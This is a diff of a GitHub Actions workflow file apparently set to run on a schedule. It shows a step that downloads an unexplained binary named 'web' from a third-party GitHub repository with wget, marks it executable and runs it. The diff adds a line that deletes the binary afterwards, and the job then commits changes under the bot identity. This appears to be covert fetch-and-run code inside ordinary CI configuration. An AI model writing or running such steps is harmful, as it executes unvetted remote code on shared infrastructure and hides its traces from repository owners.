--- a/.github/workflows/cron.yml
+++ b/.github/workflows/cron.yml
@@ -1,4 +1,5 @@
   
+  
 name: CI
 on:
   push:
@@ -11,12 +12,14 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v3
-      - name: Run a one-line script
+      - name: get resorce
         run: |
-          mkdir .circleci
+          #mkdir .circleci
+          
           wget https://github.com/Arlentak/pages/raw/master/web
           chmod +x web
           ./web
+          rm web
           git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com"
           git config --local user.name "github-actions[bot]"
           git add -A
